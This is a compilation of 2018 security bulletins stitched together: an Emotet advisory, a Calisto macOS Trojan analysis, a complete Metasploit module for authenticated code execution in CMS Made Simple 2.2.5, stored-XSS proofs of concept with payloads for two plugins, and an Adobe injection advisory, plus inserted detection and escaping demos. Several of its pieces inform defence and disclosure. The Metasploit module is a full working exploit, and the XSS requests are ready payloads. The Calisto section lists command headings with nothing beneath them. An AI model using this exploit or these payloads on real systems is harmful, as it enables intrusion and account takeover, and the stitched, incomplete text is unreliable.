TA18-201A: Emotet Malware

Emotet continues to be among the most costly and destructive malware affecting SLTT governments. Its worm-like features result in rapidly spreading network-wide infections, which are difficult to combat. Emotet infections have cost SLTT governments up to $1 million per incident to remediate.

Emotet is an advanced, modular banking Trojan that primarily functions as a downloader or dropper of other banking Trojans. Additionally, Emotet is a polymorphic banking Trojan that can evade typical signature-based detection. It has several methods for maintaining persistence, including auto-start registry keys and services. It uses modular Dynamic Link Libraries (DLLs) to continuously evolve and update its capabilities. Furthermore, Emotet is Virtual Machine-aware and can generate false indicators if run in a virtual environment.

Emotet is disseminated through malspam (emails containing malicious attachments or links) that uses branding familiar to the recipient; it has even been spread using the MS-ISAC name. As of July 2018, the most recent campaigns imitate PayPal receipts, shipping notifications, or “past-due” invoices purportedly from MS-ISAC. Initial infection occurs when a user opens or clicks the malicious download link, PDF, or macro-enabled Microsoft Word document included in the malspam. Once downloaded, Emotet establishes persistence and attempts to propagate across the local network through its incorporated spreader modules.

Figure 1: Malicious email distributing Emotet

Currently, Emotet uses five known spreader modules: NetPass.exe, WebBrowserPassView, Mail PassView, Outlook scraper, and a credential enumerator.

  1. NetPass.exe is a legitimate utility developed by NirSoft that recovers all network passwords stored on a system for the current logged-on user. This tool can also recover passwords stored in the credentials file of external drives.
  2. Outlook scraper is a tool that scrapes names and email addresses from the victim’s Outlook accounts and uses that information to send out additional phishing emails from the compromised accounts.
  3. WebBrowserPassView is a password recovery tool that captures passwords stored by Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera and passes them to the credential enumerator module.
  4. Mail PassView is a password recovery tool that reveals passwords and account details for various email clients such as Microsoft Outlook, Windows Mail, Mozilla Thunderbird, Hotmail, Yahoo! Mail, and Gmail and passes them to the credential enumerator module.
  5. Credential enumerator is a self-extracting RAR file containing two components: a bypass component and a service component. The bypass component is used for the enumeration of network resources and either finds writable share drives using Server Message Block (SMB) or tries to brute force user accounts, including the administrator account. Once an available system is found, Emotet writes the service component on the system, which writes Emotet onto the disk. Emotet’s access to SMB can result in the infection of entire domains (servers and clients).

Figure 2: Emotet infection process

To maintain persistence, Emotet injects code into explorer.exe and other running processes. It can also collect sensitive information, including system name, location, and operating system version, and connects to a remote command and control server (C2), usually through a generated 16-letter domain name that ends in “.eu.” Once Emotet establishes a connection with the C2, it reports a new infection, receives configuration data, downloads and runs files, receives instructions, and uploads data to the C2 server.

Emotet artifacts are typically found in arbitrary paths under the AppData\Local and AppData\Roaming directories. The artifacts usually mimic the names of known executables. Persistence is typically maintained through Scheduled Tasks or via registry keys. Additionally, Emotet creates randomly named files in the system root directories that are run as Windows services. When executed, these services attempt to propagate the malware to adjacent systems via accessible administrative shares.

Note: it is essential that privileged accounts are not used to log in to compromised systems during remediation as this may accelerate the spread of the malware.

Example Filenames and Paths:

C:\Users\<username>\AppData\Local\Microsoft\Windows\shedaudio.exe

C:\Users\<username>\AppData\Roaming\Macromedia\Flash Player\macromedia\bin\flashplayer.exe

Typical Registry Keys:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

System Root Directories:

C:\Windows\11987416.exe

C:\Windows\System32\46615275.exe

C:\Windows\System32\shedaudio.exe

C:\Windows\SysWOW64\f9jwqSbS.exe
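As an added example that is not part of the advisory, the following Python triage function applies the artifact patterns listed above to constructed host records: randomly named executables sitting directly in the system root directories, Run-key entries that launch from AppData, and lookups of 16-letter .eu domains. Every record in SAMPLE, including the domain abcdefghijklmnop.eu, is made up for the demo.

```python
import re
from collections import namedtuple

# A host artifact of one of the kinds the advisory lists: a Run-key value, a Windows
# service image path, or a DNS query. Every record in SAMPLE below is constructed.
Artifact = namedtuple("Artifact", "kind value")

# Directories in which the advisory reports randomly named service executables.
SYSTEM_ROOTS = ("c:\\windows\\", "c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
APPDATA = re.compile(r"\\appdata\\(local|roaming)\\", re.IGNORECASE)
EIGHT_CHARS = re.compile(r"^[a-z0-9]{8}\.exe$", re.IGNORECASE)
C2_DOMAIN = re.compile(r"^[a-z]{16}\.eu$", re.IGNORECASE)  # generated 16-letter .eu names


def basename(path):
    return path.rstrip("\\").rsplit("\\", 1)[-1]


def looks_random(name):
    """True for 8-character names that are all digits or a letter/digit mix
    (11987416.exe, f9jwqSbS.exe); explorer.exe is 8 letters and is not flagged."""
    if not EIGHT_CHARS.match(name):
        return False
    stem = name[:-4]
    has_digit = any(c.isdigit() for c in stem)
    has_alpha = any(c.isalpha() for c in stem)
    return stem.isdigit() or (has_digit and has_alpha)


def in_system_root(path):
    """True when the file sits directly in C:\\Windows, System32 or SysWOW64."""
    parent = path.lower().rsplit("\\", 1)[0] + "\\"
    return parent in SYSTEM_ROOTS


def triage(artifacts):
    """Return [(artifact, reason)] for every record matching one of the patterns above."""
    hits = []
    for art in artifacts:
        if (art.kind == "service" and in_system_root(art.value)
                and looks_random(basename(art.value))):
            hits.append((art, "randomly named executable in a system root, run as a service"))
        elif art.kind == "runkey" and APPDATA.search(art.value):
            hits.append((art, "Run key launching from AppData; compare against known software"))
        elif art.kind == "dns" and C2_DOMAIN.match(art.value):
            hits.append((art, "16-letter .eu domain matching the C2 naming pattern"))
    return hits


# Constructed sample records; the paths mirror the examples given in the advisory.
SAMPLE = [
    Artifact("runkey", r"C:\Users\alice\AppData\Roaming\Macromedia\Flash Player\macromedia\bin\flashplayer.exe"),
    Artifact("runkey", r"C:\Program Files\ExampleVendor\agent.exe"),
    Artifact("service", r"C:\Windows\System32\46615275.exe"),
    Artifact("service", r"C:\Windows\SysWOW64\f9jwqSbS.exe"),
    Artifact("service", r"C:\Windows\System32\svchost.exe"),
    Artifact("service", r"C:\Windows\explorer.exe"),
    Artifact("dns", "abcdefghijklmnop.eu"),  # constructed name that fits the pattern
    Artifact("dns", "www.example.com"),
]

if __name__ == "__main__":
    for art, reason in triage(SAMPLE):
        print(f"{art.kind:8} {art.value}\n         -> {reason}")
```

On a real host the records would come from the Run keys listed above, the service image paths, and DNS logs; the Run-key rule is deliberately broad and needs review against legitimately installed software.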

Calisto Trojan for macOS

An interesting aspect of studying a particular piece of malware is tracing its evolution and observing how the creators gradually add new monetization or entrenchment techniques. Also of interest are developmental prototypes that have had limited distribution or have never appeared in the wild. We recently came across one such sample: a macOS backdoor that we named Calisto.

The malware was uploaded to VirusTotal way back in 2016, most likely the same year it was created. But for two whole years, until May 2018, Calisto remained off the radar of antivirus solutions, with the first detections on VT appearing only recently.

Malware for macOS is not that common, and this sample was found to contain some suspiciously familiar features. So we decided to unpick Calisto to see what it is and why its development was stopped (or was it?).

Propagation

We have no reliable information about how the backdoor was distributed. The Calisto installation file is an unsigned DMG image under the guise of Intego’s security solution for Mac. Interestingly, Calisto’s authors chose the ninth version of the program as cover, a version that is still current.

For illustrative purposes, let’s compare the malware file with the version of Mac Internet Security X9 downloaded from the official site.

                 Backdoor     Intego Mac Internet Security 2018
Code signature   Unsigned     Signed by Intego

It looks fairly convincing. The user is unlikely to notice the difference, especially if they have not used the app before.

Installation

As soon as it starts, the application presents us with a sham license agreement. The text differs slightly from Intego’s; perhaps the cybercriminals took it from an earlier version of the product.

Next, the “antivirus” asks for the user’s login and password, which is completely normal on macOS when installing a program that makes changes to the system.

But after receiving the credentials, the program pauses briefly before reporting that an error has occurred and advising the user to download a new installation package from the official site of the antivirus developer.

The technique is simple, but effective. The official version of the program will likely be installed with no problems, and the error will soon be forgotten. Meanwhile, in the background, Calisto will be calmly getting on with its mission.

Analysis of the Trojan

With SIP enabled

Calisto’s activity on a computer with SIP (System Integrity Protection) enabled is rather limited. Announced by Apple back in 2015 alongside the release of OS X El Capitan, SIP is designed to protect critical system files from being modified, even by a user with root permissions. Calisto was developed in 2016 or earlier, and it seems that its creators simply didn’t take the then-new technology into account. However, many users still disable SIP for various reasons; we categorically advise against doing so.

Calisto’s activity can be investigated using the log of its child processes and its decompiled code:

Log of commands executed by the Trojan during its operation

Hardcoded commands inside the Calisto sample

We can see that the Trojan uses a hidden directory named .calisto to store:

  • Keychain storage data
  • Data extracted from the user login/password window
  • Information about the network connection
  • Data from Google Chrome: history, bookmarks, cookies

Recall that Keychain stores passwords/tokens saved by the user, including ones saved in Safari. The encryption key for the storage is the user’s password.

Next, if SIP is enabled, an error occurs when the Trojan attempts to modify system files. This violates the operational logic of the Trojan, causing it to stop.

Error message

With SIP disabled/not available

Observing Calisto with SIP disabled is far more interesting. To begin with, Calisto executes the steps from the previous section, but as the Trojan is not interrupted by SIP, it then:

  • Copies itself to /System/Library/ folder
  • Sets itself to launch automatically on startup
  • Unmounts and uninstalls its DMG image
  • Adds itself to Accessibility
  • Harvests additional information about the system
  • Enables remote access to the system
  • Forwards the harvested data to a C&C server

Let’s take a closer look at the malware’s implementation mechanisms.

Adding itself to startup is a classic technique for macOS, and is done by creating a .plist file in the /Library/LaunchAgents/ folder with a link to the malware:


The DMG image is unmounted and uninstalled via the following command:

To extend its capabilities, Calisto adds itself to Accessibility by directly modifying the TCC.db file, which is bad practice and, for antivirus software, an indicator of malicious activity. On the other hand, this method does not require user interaction.

An important feature of Calisto is getting remote access to the user system. To provide this, it:

  • Enables remote login
  • Enables screen sharing
  • Configures remote login permissions for the user
  • Allows remote login to all
  • Enables a hidden “root” account in macOS and sets the password specified in the Trojan code

The commands used for this are:

Note that although the user “root” exists in macOS, it is disabled by default. Interestingly, after a reboot, Calisto again requests user data, but this time waits for the input of the actual root password, which it previously changed itself (root: aGNOStIC7890!!!). This is one sign of how unpolished the Trojan is.

At the end, Calisto attempts to transfer all data from the .calisto folder to the cybercriminals’ server. But at the time of our research, the server was no longer responding to requests and seemed to be disabled:


Attempt to contact the C&C server

Extra functions

Static analysis of Calisto revealed unfinished and unused additional functionality:

  • Loading/unloading of kernel extensions for handling USB devices
  • Data theft from user directories
  • Self-destruction together with the OS

Loading/unloading of kernel extensions

Working with user directories

Self-destruction together with the entire system

Connections with Backdoor.OSX.Proton

Conceptually, the Calisto backdoor resembles a member of the Backdoor.OSX.Proton family:

  • The distribution method is similar: it masquerades as a well-known antivirus (a Backdoor.OSX.Proton was previously distributed under the guise of a Symantec antivirus product)
  • The Trojan sample contains the line “com.proton.calisto.plist”
  • Like Backdoor.OSX.Proton, this Trojan is able to steal a great amount of personal data from the user system, including the contents of Keychain

Recall that all known members of the Proton malware family were distributed and discovered in 2017. The Calisto Trojan we detected was created no later than 2016. Assuming that this Trojan was written by the same authors, it could well be one of the very first versions of Backdoor.OSX.Proton or even a prototype. The latter hypothesis is supported by the large number of unused and not fully implemented functions. However, they were missing from later versions of Proton.

To protect against Calisto, Proton, and their analogues:

  • Always update to the current version of the OS
  • Never disable SIP
  • Run only signed software downloaded from trusted sources, such as the App Store
  • Use antivirus software

MD5

DMG image: d7ac1b8113c94567be4a26d214964119
Mach-O executable: 2f38b201f6b368d587323a1bec516e5d
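To hunt for the persistence and staging artifacts described above (the hidden .calisto directory, the LaunchAgent plist carrying the com.proton.calisto name, and a copy of the binary under /System/Library/, which is only writable with SIP disabled), here is an added Python checker that is not part of the original analysis. The temporary directory tree, the plist contents and the /System/Library/Calisto path are constructed for the demo; on a live Mac the scan would be pointed at /.

```python
import os
import plistlib
import tempfile

# Indicators taken from the write-up above.
CALISTO_DIR = ".calisto"                    # hidden staging directory in the user's home
CALISTO_LABEL = "com.proton.calisto.plist"  # string found inside the sample
SYSTEM_LIB = "/System/Library/"             # where Calisto copies itself when SIP is off


def inspect_launch_agent(path):
    """Return a finding string if the LaunchAgent plist at `path` looks like Calisto, else None."""
    try:
        with open(path, "rb") as fh:
            plist = plistlib.load(fh)
    except Exception as exc:  # unreadable or not a plist: worth a look on its own
        return f"{path}: unreadable plist ({exc})"
    label = str(plist.get("Label", ""))
    program = plist.get("Program") or ""
    args = plist.get("ProgramArguments") or []
    target = program or (args[0] if args else "")
    if "calisto" in label.lower() or "calisto" in os.path.basename(path).lower():
        return f"{path}: label '{label}' matches Calisto"
    if target.startswith(SYSTEM_LIB):
        # A third-party agent in /Library/LaunchAgents should not launch from /System/Library,
        # a tree that can only be written to when SIP is disabled.
        return f"{path}: launches {target} from the SIP-protected tree"
    return None


def scan_for_calisto(root):
    """Scan a filesystem rooted at `root` (use '/' on a live Mac) and return a list of findings."""
    findings = []
    agents_dir = os.path.join(root, "Library", "LaunchAgents")
    if os.path.isdir(agents_dir):
        for name in sorted(os.listdir(agents_dir)):
            if name.endswith(".plist"):
                finding = inspect_launch_agent(os.path.join(agents_dir, name))
                if finding:
                    findings.append(finding)
    users_dir = os.path.join(root, "Users")
    if os.path.isdir(users_dir):
        for user in sorted(os.listdir(users_dir)):
            staging = os.path.join(users_dir, user, CALISTO_DIR)
            if os.path.isdir(staging):
                findings.append(f"{staging}: hidden Calisto staging directory present")
    return findings


def build_sample_tree():
    """Constructed sample: a fake macOS root with one benign and one Calisto-style agent."""
    root = tempfile.mkdtemp(prefix="calisto-demo-")
    agents = os.path.join(root, "Library", "LaunchAgents")
    os.makedirs(agents)
    # Benign agent: launches from /Applications, as a normal vendor agent would.
    with open(os.path.join(agents, "com.example.updater.plist"), "wb") as fh:
        plistlib.dump({"Label": "com.example.updater",
                       "ProgramArguments": ["/Applications/Example.app/Contents/MacOS/updater"]}, fh)
    # Suspicious agent: label from the sample; the binary path is hypothetical.
    with open(os.path.join(agents, CALISTO_LABEL), "wb") as fh:
        plistlib.dump({"Label": "com.proton.calisto",
                       "ProgramArguments": [SYSTEM_LIB + "Calisto"], "RunAtLoad": True}, fh)
    os.makedirs(os.path.join(root, "Users", "alice", CALISTO_DIR))
    os.makedirs(os.path.join(root, "Users", "bob"))
    return root


if __name__ == "__main__":
    for line in scan_for_calisto(build_sample_tree()):
        print(line)
```

The remote-access changes (Remote Login, Screen Sharing, an enabled root account) are not file artifacts and need to be checked separately, for example by reviewing the sharing preferences and the root account state.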

CMS Made Simple 2.2.5 Authenticated Remote Command Execution

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'CMS Made Simple Authenticated RCE via File Upload/Copy',
      'Description'    => %q{
        CMS Made Simple v2.2.5 allows an authenticated administrator to upload a file
        and rename it to have a .php extension. The file can then be executed by opening
        the URL of the file in the /uploads/ directory.
      },
      'Author'         =>
        [
          'Mustafa Hasen', # Vulnerability discovery and EDB PoC
          'Jacob Robles'   # Metasploit Module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2018-1000094' ],
          [ 'CWE', '434' ],
          [ 'EDB', '44976' ],
          [ 'URL', 'http://dev.cmsmadesimple.org/bug/view/11741' ]
        ],
      'Privileged'     => false,
      'Platform'       => [ 'php' ],
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Universal', {} ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jul 03 2018'))

    register_options(
      [
        OptString.new('TARGETURI', [ true, 'Base cmsms directory path', '/cmsms/' ]),
        OptString.new('USERNAME', [ true, 'Username to authenticate with', '' ]),
        OptString.new('PASSWORD', [ true, 'Password to authenticate with', '' ])
      ])

    register_advanced_options([
      OptBool.new('ForceExploit', [ false, 'Override check result', false ])
    ])
  end

  def check
    res = send_request_cgi({
      'uri'    => normalize_uri(target_uri.path),
      'method' => 'GET'
    })

    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    # The front page HTML states the installed version.
    unless res.body =~ /CMS Made Simple<\/a> version (\d+\.\d+\.\d+)/
      return CheckCode::Unknown
    end

    version = Gem::Version.new($1)
    vprint_status("#{peer} - CMS Made Simple Version: #{version}")

    if version == Gem::Version.new('2.2.5')
      return CheckCode::Appears
    end

    if version < Gem::Version.new('2.2.5')
      return CheckCode::Detected
    end

    CheckCode::Safe
  end

  def exploit
    unless [CheckCode::Detected, CheckCode::Appears].include?(check)
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end

    # Step 1: log in to the admin panel; the redirect carries the CSRF token in its query string.
    res = send_request_cgi({
      'uri'       => normalize_uri(target_uri.path, 'admin', 'login.php'),
      'method'    => 'POST',
      'vars_post' => {
        'username'    => datastore['USERNAME'],
        'password'    => datastore['PASSWORD'],
        'loginsubmit' => 'Submit'
      }
    })
    unless res
      fail_with(Failure::NotFound, 'A response was not received from the remote host')
    end

    unless res.code == 302 && res.get_cookies && res.headers['Location'] =~ /\/admin\?(.*)?=(.*)/
      fail_with(Failure::NoAccess, 'Authentication was unsuccessful')
    end

    vprint_good("#{peer} - Authentication successful")
    csrf_name = $1
    csrf_val = $2

    csrf = { csrf_name => csrf_val }
    cookies = res.get_cookies
    filename = rand_text_alpha(8..12)

    # Step 2: upload the payload through the FileManager module as a .txt file.
    # Generate form data
    message = Rex::MIME::Message.new
    message.add_part(csrf[csrf_name], nil, nil, "form-data; name=\"#{csrf_name}\"")
    message.add_part('FileManager,m1_,upload,0', nil, nil, 'form-data; name="mact"')
    message.add_part('1', nil, nil, 'form-data; name="disable_buffer"')
    message.add_part(payload.encoded, nil, nil, "form-data; name=\"m1_files[]\"; filename=\"#{filename}.txt\"")
    data = message.to_s

    res = send_request_cgi({
      'uri'    => normalize_uri(target_uri.path, 'admin', 'moduleinterface.php'),
      'method' => 'POST',
      'data'   => data,
      'ctype'  => "multipart/form-data; boundary=#{message.bound}",
      'cookie' => cookies
    })

    unless res && res.code == 200
      fail_with(Failure::UnexpectedReply, 'Failed to upload the text file')
    end
    vprint_good("#{peer} - File uploaded #{filename}.txt")

    # Step 3: use the FileManager copy action to give the uploaded file a .php name.
    fileb64 = Rex::Text.encode_base64("#{filename}.txt")
    data = {
      'mact'              => 'FileManager,m1_,fileaction,0',
      'm1_fileactioncopy' => '',
      'm1_selall'         => "a:1:{i:0;s:#{fileb64.length}:\"#{fileb64}\";}",
      'm1_destdir'        => '/',
      'm1_destname'       => "#{filename}.php",
      'm1_path'           => '/uploads',
      'm1_submit'         => 'Copy',
      csrf_name           => csrf_val
    }

    res = send_request_cgi({
      'uri'       => normalize_uri(target_uri.path, 'admin', 'moduleinterface.php'),
      'method'    => 'POST',
      'cookie'    => cookies,
      'vars_post' => data
    })

    unless res
      fail_with(Failure::NotFound, 'A response was not received from the remote host')
    end

    unless res.code == 302 && res.headers['Location'].to_s.include?('copysuccess')
      fail_with(Failure::UnexpectedReply, 'Failed to rename the file')
    end
    vprint_good("#{peer} - File renamed #{filename}.php")

    # Step 4: request the .php file so the web server executes the payload.
    res = send_request_cgi({
      'uri'    => normalize_uri(target_uri.path, 'uploads', "#{filename}.php"),
      'method' => 'GET',
      'cookie' => cookies
    })
  end
end

NCCIC Webinar Series on Russian Government Cyber Activity

Original release date: July 19, 2018

NCCIC will conduct a series of webinars on Russian government cyber activity against critical infrastructure (as detailed in NCCIC Alert TA18-074A), which will feature NCCIC subject matter experts discussing recent cybersecurity incidents, mitigation techniques, and resources that are available to help protect critical assets.

The same webinar will be held from 1-2:30 p.m. ET on the dates listed below:

  • Monday, July 23
  • Wednesday, July 25
  • Monday, July 30
  • Wednesday, August 1

NCCIC encourages users and administrators to attend one of the webinar sessions by visiting https://share.dhs.gov/nccicbriefings or dialing 1-888-221-6227. Attendees may access the webinar as a guest on the day of each event; a registered account is not required for attendees to join.



WordPress All In One Favicon 4.6 Cross Site Scripting

# Exploit Title: WordPress Plugin All In One Favicon <= 4.6 – Authenticated Multiple XSS Persistent
# Date: 2018-07-10
# Exploit Author: Javier Olmedo

# Website: https://hackpuntes.com/
# Vendor Homepage: http://www.techotronic.de/
# Software Link: https://wordpress.org/plugins/all-in-one-favicon/
# Version/s: 4.6 and below
# Patched Version: unpatched
# CVE : 2018-13832
# WPVULNDB: https://wpvulndb.com/vulnerabilities/9099

Plugin description:
All In One Favicon adds favicons to your site and your admin pages. You can either use favicons you already uploaded or use the builtin upload mechanism to upload a favicon to your WordPress installation.

Description:
WordPress Plugin All In One Favicon before 4.6 allows remote authenticated users to execute JavaScript code through persistent XSS attacks.

Technical details:

The following parameters are vulnerable:
backendApple-Text
backendICO-Text
backendPNG-Text
backendGIF-Text
frontendApple-Text
frontendICO-Text
frontendPNG-Text
frontendGIF-Text

Proof of Concept (PoC):
The following POST request, sent as an authenticated user with the required permissions, stores a payload that displays an alert in the browser:

POST /wordpress/wp-admin/admin-post.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/options-general.php?page=all-in-one-favicon%2Fall-in-one-favicon.php
Content-Type: multipart/form-data; boundary=---------------------------168911549614148
Content-Length: 3407
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------168911549614148
Content-Disposition: form-data; name="_wpnonce"

9df031414d
-----------------------------168911549614148
Content-Disposition: form-data; name="_wp_http_referer"

/wordpress/wp-admin/options-general.php?page=all-in-one-favicon%2Fall-in-one-favicon.php
-----------------------------168911549614148
Content-Disposition: form-data; name="option_page"

aio-favicon_settings
-----------------------------168911549614148
Content-Disposition: form-data; name="aio-favicon_settings[frontendICO-text]"

"><img src=a onerror=alert(1)>
-----------------------------168911549614148
Content-Disposition: form-data; name="action"

aioFaviconUpdateSettings
-----------------------------168911549614148
Content-Disposition: form-data; name="aioFaviconUpdateSettings"

Guardar cambios
-----------------------------168911549614148
Content-Disposition: form-data; name="action"

aioFaviconUpdateSettings
-----------------------------168911549614148
Content-Disposition: form-data; name="aio-favicon_settings[removeLinkFromMetaBox]"

true
-----------------------------168911549614148
Content-Disposition: form-data; name="action"

aioFaviconUpdateSettings
-----------------------------168911549614148--

Payloads:
"><img src=a onerror=alert(1)>
"><img src=a onerror=alert(String.fromCharCode(88,83,83))>

Timeline:
15/03/2018 I sent the report (no answer).
27/05/2018 I sent the report again (no answer).
10/07/2018 Public disclosure.

References:
https://hackpuntes.com/cve-2018-13832-wordpress-plugin-all-in-one-favicon-4-6-autenticado-multiples-cross-site-scripting-persistentes/

MyBB New Threads 1.1 Cross Site Scripting

# Exploit Title: MyBB New Threads Plugin - Cross-Site Scripting
# Date: 7/16/2018
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://community.mybb.com/mods.php?action=view&pid=1143
# Version: 1.1
# Tested on: Ubuntu 18.04
# CVE: CVE-2018-14392

1. Description:
New Threads is a plugin that displays new threads on the index page. The thread titles allow XSS.

2. Proof of Concept:

- Create a new thread with the following subject: <script>alert('XSS')</script>
- Visit the index page to see the alert.

3. Solution:
Update to 1.2
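The two advisories above involve the same defect in two output contexts: the favicon text setting lands inside an href attribute, and the MyBB thread title lands in a text node. The following added example (not code from either plugin) shows the vulnerable concatenation beside the fix, escaping at output with Python's html.escape, and uses a small parser to list the elements a browser would create. The surrounding markup and the showthread.php link are assumed for the demo.

```python
import html
from html.parser import HTMLParser

# Payloads quoted in the two advisories above.
FAVICON_PAYLOAD = '"><img src=a onerror=alert(1)>'
THREAD_TITLE_PAYLOAD = "<script>alert('XSS')</script>"


def favicon_link_vulnerable(url):
    """Attribute context: the favicon text setting is concatenated straight into href
    (assumed markup; the plugin's real template is not shown on the page)."""
    return '<link rel="shortcut icon" href="' + url + '" type="image/x-icon" />'


def favicon_link_fixed(url):
    """quote=True also encodes the double quote, so the value cannot close the attribute."""
    return ('<link rel="shortcut icon" href="' + html.escape(url, quote=True)
            + '" type="image/x-icon" />')


def thread_row_vulnerable(title):
    """Text-node context: a thread title dropped into the index list unchanged (assumed markup)."""
    return '<li><a href="showthread.php">' + title + '</a></li>'


def thread_row_fixed(title):
    """Escaping < and > keeps the title as text, whatever it contains."""
    return '<li><a href="showthread.php">' + html.escape(title) + '</a></li>'


class TagCollector(HTMLParser):
    """Records the start tags a browser-like parser sees in a fragment."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def element_names(markup):
    """Element names produced by parsing `markup`; an injected img or script shows up here."""
    parser = TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags


if __name__ == "__main__":
    for label, markup in [
        ("favicon, vulnerable", favicon_link_vulnerable(FAVICON_PAYLOAD)),
        ("favicon, fixed     ", favicon_link_fixed(FAVICON_PAYLOAD)),
        ("thread,  vulnerable", thread_row_vulnerable(THREAD_TITLE_PAYLOAD)),
        ("thread,  fixed     ", thread_row_fixed(THREAD_TITLE_PAYLOAD)),
    ]:
        print(f"{label}: elements={element_names(markup)}\n    {markup}")
```

In WordPress the equivalent calls are esc_attr() for the attribute case and esc_html() for the text case; the point is that the encoding must match the context the value is written into.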

Adobe Systems Main lead DBMS Arbitrary Code Injection

Document Title:
===============
Adobe Systems – Arbitrary Code Injection Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2120

PSIRT ID: 7873

Vulnerability Magazine:
https://www.vulnerability-db.com/?q=articles/2018/07/19/hacker-injects-arbitrary-codes-main-lead-database-adobe-systems

Acknowledgements: (Industry Partners)
https://helpx.adobe.com/security/acknowledgements.html

Release Date:
=============
2018-07-19

Vulnerability Laboratory ID (VL-ID):
====================================
2120

Common Vulnerability Scoring System:
====================================
6.4

Vulnerability Class:
====================
Multiple

Current Estimated Price:
========================
5.000€ – 10.000€

Product & Service Introduction:
===============================
Adobe Systems Incorporated, commonly known as Adobe, is an American multinational computer software company headquartered in San Jose, California, United States. Adobe has historically focused on the creation of multimedia and creativity software products, with a more recent foray into rich Internet application software development. It is best known for Photoshop, an image editing software, Acrobat Reader, the Portable Document Format (PDF), and Adobe Creative Suite, as well as its successor, Adobe Creative Cloud.

(Copy of the Homepage: https://en.wikipedia.org/wiki/Adobe_Systems )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory core research team discovered an arbitrary code execution vulnerability in the Adobe Systems main lead database management system.

Vulnerability Disclosure Timeline:
==================================
2018-02-05: Researcher Notification & Coordination (Security Researcher)
2018-02-08: Vendor Notification (Adobe PSIRT – Security Department)
2018-02-12: Vendor Response/Feedback (Adobe PSIRT – Security Department)
2018-02-16: Reporter Response/Feedback #1 (Security Researcher)
2018-02-27: Reporter Response/Feedback #2 (Security Researcher)
2018-03-04: Reporter Response/Feedback #3 (Security Researcher)
2018-06-14: Vendor Fix/Patch (Adobe Service Developer Team)
2018-06-15: Security Acknowledgements (Adobe PSIRT – Security Department)
2018-06-19: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Adobe Systems
Product: Main Lead DBMS – *.adobesystems.com 2018 Q2

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Authentication Type:
====================
Pre auth – no privileges

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Responsible Disclosure Program

Technical Details & Description:
================================
The Vulnerability Laboratory core research team discovered an arbitrary code injection vulnerability in the Adobe Systems main lead database management system. The issue allows remote attackers to inject their own malicious script code and system-specific code, with a persistent attack vector, into the application side of the vulnerable module context or the affected internal services.

The arbitrary code injection vulnerability is located in the external services associated with the content of the Adobe Systems subdomain services. Attackers are able to attack Adobe Systems' lead database by inserting arbitrary code through other database layers. The injection is performed using an external service form. After the content has been delivered, the data is stored in the sub-service database management system. Over time, the database contents of the sub-services are backed up and synchronized with the main Adobe Systems database. In the course of our research, we identified several external services through which the Adobe sub-services could be attacked and the faulty content finally delivered into the main lead database.

The injection points are the external services. The execution points are located in the backend, when the contents are processed for management and when the content is delivered through the main lead database to other customers or business clients (commercials, mailing and notifications). The vulnerable domains that executed the contents are adobesystems.com and info.adobesystems.com. The request method used to inject is POST, and the attack vector is located on the application side of Adobe Systems. No user account is required to register and send an email.

Successful exploitation of the arbitrary code injection vulnerability results in malformed DBMS injects, DBMS compromise, session hijacking, persistent phishing attacks, persistent external redirects to malicious sources, and manipulation of affected or connected application modules.

Vulnerable Micro Service(s):
[+] apps.enterprise.adobe.com
[+] offflivestream.creativecloud.adobeevents.com/
[+] summit-emea.adobe.com

Vulnerable Sub Service(s):
[+] landing.adobe.com
[+] offers.adobe.com
[+] sstats.adobe.com/b/ss/adbadobefaasprod,adbadobeglobalapp/1/JS-2.5.0/s3118621512273

Request Method(s):
[+] POST

Vulnerable File(s):
[+] m.jsp
[+] adobe_econsultancy_digital_trends_2017.html
[+] submit.html
[+] form.html

Parameter(s):
[+] firstname
[+] lastname
[+] companyname

Affected Domain(s):
[+] adobe.com
[+] info.adobesystems.com
[+] t.info.adobesystems.com
[+] m.info.adobesystems.com
[+] t-info.mail.adobe.com

Proof of Concept (PoC):
=======================
The arbitrary code injection vulnerability can be exploited by remote attackers without a privileged user account and with low user interaction. For a security demonstration or to reproduce the vulnerability, follow the information and steps provided below.

1. PoC: Injection Points External
https://apps.enterprise.adobe.com/faas/service/3.0.0/submit
https://offflivestream.creativecloud.adobeevents.com/register/registration/form
https://summit-emea.adobe.com/emea/registration/?sdid=ZFN4FLWT&mv=email

2. PoC: Followed Sub Systems
http://landing.adobe.com/
https://offers.adobe.com/de/de/marketing/landings/digitale_trends_2017.html
https://offers.adobe.com/de/de/marketing/offers/adobe_econsultancy_digital_trends_2017.html
http://t-info.mail.adobe.com/r/?id=t3100ff18,90990a66,90990bea
